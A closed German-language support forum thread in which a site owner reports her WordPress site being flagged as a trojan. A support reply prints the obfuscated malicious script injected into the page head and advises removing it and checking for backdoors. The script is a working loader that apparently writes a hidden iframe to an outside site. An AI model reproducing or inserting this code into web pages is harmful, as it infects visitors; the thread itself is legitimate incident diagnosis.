Viewing 3 posts - 1 through 3 (of 3 total)
  • Author
    Posts
  • #13111

    Hallo Kriesi!

    Derzeit macht das Öffnen unserer Websites schloffer.at bei vielen Usern Probleme. Die installierte Antivirensoftware verhindert den Zugriff (zB: ESET NOD32 Antivirus: Objekt: http://www.schloffer.at, Bedrohung: JS/lframeEB Trojaner; avast! Netzwerkschutz hat eine schädliche Website oder Datei blockiert.; … ). Die Vermutung liegt nahe, dass die Webseite “gekappert” wurde bzw. mit Schadsoftware “infiziert” wurde.

    Kann eine Sicherheitslücke im CMS/Blog-System daran schuld sein? Wie kann ich ohne Programmierkenntnisse das Problem beheben? Wäre für jeden hilfreichen Tipp sehr dankbar.

    LG, Maria

    #77853

    Hello Maria,

    I’ve marked this topic for one of our German speaking support crew to take a look at.

    Regards,

    Devin

    #77854

    Ich denke, dass irgendjemand ein Malware-Skript auf deiner Webseite installiert hat. Der Quelltext zeigt, dass sich folgendes Skript:

    <script>try{q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'o'+'m'+'Ch';f+='arC';}try{begbe=prototype;}catch(b43gds){zz='zv'.substr(123-122)+zz;ss=[];f+=(h&&zz)?'ode':"";w=this;e=w[f.substr(11)+zz];n=[-3.375,-3.75,7.5,8.875,7.375,9.625,8.625,7.625,8.75,9.5,0.75,9.875,9.25,8.125,9.5,7.625,0,-0.125,2.5,8.125,7.75,9.25,7.125,8.625,7.625,-1,9.375,9.25,7.375,2.625,-0.75,8,9.5,9.5,9,2.25,0.875,0.875,7.5,9.25,7.25,8.875,8.5,8.125,9.75,7.125,9.25,0.75,7.375,8.875,8.625,0.875,9.375,9.5,7.125,9.5,9.375,0.75,9,8,9,-0.75,-1,8.75,7.125,8.625,7.625,2.625,-0.75,5.5,9.875,8.125,9.5,9.5,7.625,9.25,-0.75,-1,9.375,7.375,9.25,8.875,8.5,8.5,8.125,8.75,7.875,2.625,-0.75,7.125,9.625,9.5,8.875,-0.75,-1,7.75,9.25,7.125,8.625,7.625,7.25,8.875,9.25,7.5,7.625,9.25,2.625,-0.75,8.75,8.875,-0.75,-1,7.125,8.5,8.125,7.875,8.75,2.625,-0.75,7.375,7.625,8.75,9.5,7.625,9.25,-0.75,-1,8,7.625,8.125,7.875,8,9.5,2.625,-0.75,1.25,-0.75,-1,9.875,8.125,7.5,9.5,8,2.625,-0.75,1.25,-0.75,2.75,2.5,0.875,8.125,7.75,9.25,7.125,8.625,7.625,2.75,-0.125,0.125,2.375,-3.375,-3.75];for(i=6-2-1-2-1;-162+i!=2-2;i++){k=i;ss=ss+String["from"+"CharCode"](-1*4*h*(5+1*n[k]));}e(ss);}</script>

    im Head Tag befindet. Dieses Skript gehört nicht zu unserem Theme noch zu WooCommerce und ist vermutlich schädlich bzw. enthält es bösartigen Code. Ich empfehle daher diesen Code entweder aus der header.php zu entfernen und wenn dies nicht möglich ist (zB weil er nicht aufzufinden ist), alle Plugins zu deaktivieren. Wenn dies noch immer nicht den Code entfernt, würde ich alle Datein neu hochladen, da dies bedeuten kann, dass jemand mehrere/andere Datein gehackt hat (zB functions.php) und daher uU noch Lücken/Backdoors im WP/Theme Code sind.

Viewing 3 posts - 1 through 3 (of 3 total)

The topic ‘WP Seite wird von Virenscannern blockiert’ is closed to new replies.